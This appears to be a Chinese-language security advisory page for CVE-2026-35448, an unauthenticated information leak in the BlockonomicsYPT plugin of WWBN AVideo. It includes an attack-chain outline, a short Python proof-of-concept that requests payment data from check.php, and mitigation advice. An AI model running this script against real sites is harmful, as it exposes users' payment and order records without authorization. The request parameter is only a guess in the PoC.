CVE-2026-35448 CVSS 3.7 低危

CVE-2026-35448 AVideo插件信息泄露漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35448

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 26.0及更早版本中的BlockonomicsYPT插件存在安全漏洞。其check.php端点未实施身份验证检查，允许未经授权的攻击者查询任意比特币地址的支付订单数据，导致敏感信息泄露。

技术细节

该漏洞源于BlockonomicsYPT插件的check.php端点缺乏独立的访问控制机制。该端点设计初衷是作为已认证页面invoice.php的AJAX轮询助手，用于查询支付状态。然而，开发者在实现时未验证请求者的身份凭证。由于比特币地址在区块链上是公开可见的，攻击者只需向check.php发送包含目标比特币地址的HTTP请求，即可绕过平台登录验证，直接获取与该地址关联的支付记录和订单详情。这属于典型的服务器端访问控制失效漏洞。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用的是WWBN AVideo平台，并且启用了BlockonomicsYPT插件。

STEP 2

信息收集

攻击者通过区块链浏览器或平台公开页面获取与该平台关联的比特币地址。

STEP 3

漏洞利用

攻击者直接向`/plugin/BlockonomicsYPT/check.php`发送HTTP GET请求，并将获取的比特币地址作为参数传入。

STEP 4

数据泄露

服务器端未进行身份验证即返回了该比特币地址对应的支付订单状态和详细信息，攻击者成功获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-35448
# This script demonstrates how to retrieve payment data without authentication
import requests

def check_vulnerability(target_url, btc_address):
    # The vulnerable endpoint is typically located at the plugin path
    endpoint = f"{target_url}/plugin/BlockonomicsYPT/check.php"
    
    # Parameters might vary based on actual implementation, 'addr' is a common parameter for Bitcoin addresses
    params = {
        "addr": btc_address
    }
    
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected!")
            print(f"[+] Response from server: {response.text}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL and a known Bitcoin address on the platform
    target = "http://example.com"
    address = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa" 
    check_vulnerability(target, address)

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

临时缓解措施包括在Web服务器（如Nginx或Apache）层面配置访问控制规则（如IP白名单），限制对`/plugin/BlockonomicsYPT/check.php`路径的直接访问，或者通过应用层防火墙（WAF）拦截对该路径的未授权请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表